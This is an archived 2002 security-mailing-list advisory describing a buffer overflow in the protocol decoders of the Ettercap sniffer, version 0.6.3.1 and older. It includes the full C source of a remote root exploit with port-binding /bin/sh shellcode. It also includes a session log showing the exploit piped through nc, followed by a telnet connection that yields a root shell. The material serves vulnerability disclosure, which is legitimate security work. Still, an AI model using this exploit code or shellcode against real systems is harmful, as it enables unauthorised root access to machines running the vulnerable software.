[UNIX] Ettercap Remote Root Compromise
From: support@securiteam.comDate: 02/15/02
- Previous message: support@securiteam.com: "[UNIX] Security Vulnerability Found in Sawmill (Incorrect Permissions)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 15 Feb 2002 01:19:33 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Ettercap Remote Root Compromise
------------------------------------------------------------------------
SUMMARY
<http://ettercap.sourceforge.net/> Ettercap is a multipurpose sniffer /
interceptor / logger for switched LAN. It supports active and passive
dissection of many protocols (even ciphered ones) and includes many
features for network and host analysis. A security vulnerability in its
parsers allows remote attackers to cause the program to execute arbitrary
code.
DETAILS
Vulnerable systems:
Ettercap 0.6.3.1 and older
Immune systems:
Ettercap 0.6.4
Ettercap is composed of decoders that look for user, passwords,
communities, and other types of sensitive information.
Several decoders (MySQL, IRC and others) suffer from the following
problem:
memcpy(collector, payload, data_to_ettercap->datalen);
Collector is declared as:
u_char collector[MAX_DATA];
Where MAX_DATA is:
#define MAX_DATA 2000
Datalen is the data (after TCP/UDP header) length read from the interface.
So on interfaces where MTU is higher than 2000 you can exploit Ettercap.
Since normal Ethernets have MTU:1500 this bug can not be exploited due to
unsupported defragmentation in Ettercap, but may be crashed with a forged
packet (ip->tot_len > MAX_DATA).
Here are common MTU and interface types:
65535 Hyperchannel
17914 16 Mbit/sec token ring
8166 Token Bus (IEEE 802.4)
4464 4 Mbit/sec token ring (IEEE 802.5)
1500 Ethernet
1500 PPP (typical; can vary widely)
Exploit:
Sample exploitation could be also in loopback interfaces: MTU:16436
piscis:~# ettercap -NszC -i lo &
[1] 21887
piscis:~# ./ettercap-x 0 | nc localhost 3306
ettercap-0.6.3.1 xploit by Ferm?n J. Serna <fjserna@ngsec.com>
Next Generation Security Technologies
http://www.ngsec.com
punt!
piscis:~# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)
Exploit Code:
/*
* ettercap-0.6.3.1 remote root xploit
*
* By: Ferm?n J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* DESCRIPTION:
* ============
*
* Several decoders (mysql, irc, ...) suffer the following problem:
*
* memcpy(collector, payload, data_to_ettercap->datalen);
*
* collector is declared as:
*
* u_char collector[MAX_DATA];
*
* where MAX_DATA is:
*
* #define MAX_DATA 2000
*
* So on interfaces where MTU is higher than 2000 you can exploit
* ettercap. Nop, normal ethernets have MTU:1500 ;P
*
* Here are common MTU and interface types:
*
* 65535 Hyperchannel
* 17914 16 Mbit/sec token ring
* 8166 Token Bus (IEEE 802.4)
* 4464 4 Mbit/sec token ring (IEEE 802.5)
* 1500 Ethernet
* 1500 PPP (typical; can vary widely)
*
* Sample explotation could be also in loopback interfaces: MTU:16436
*
* piscis:~# ettercap -NszC -i lo &
* [1] 21887
* piscis:~# ./ettercap-x 0 | nc localhost mysql
* ettercap-0.6.3.1 xploit by Ferm?n J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* punt!
* piscis:~# telnet localhost 36864
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id;
* uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
* Madrid, 5/02/2002
*
*/
#include <stdio.h>
#include <string.h>
#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0
char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";
int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;
fprintf(stderr,"ettercap-0.6.3.1 xploit by Ferm?n J. Serna
<fjserna@ngsec.com>\n");
fprintf(stderr,"Next Generation Security Technologies\n");
fprintf(stderr,"http://www.ngsec.com\n\n");
if (argc==2) offset=atoi(argv[1]);
memset(buffer,0,sizeof(buffer));
ch_ptr=buffer;
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
memcpy(ch_ptr,shellcode,strlen(shellcode));
ch_ptr+=strlen(shellcode);
lg_ptr=(unsigned long *)ch_ptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
ch_ptr=(char *)lg_ptr;
*ch_ptr='\0';
printf("%s",buffer);
return(0);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:fjserna@ngsec.com> Fermin J.
Serna.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Security Vulnerability Found in Sawmill (Incorrect Permissions)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
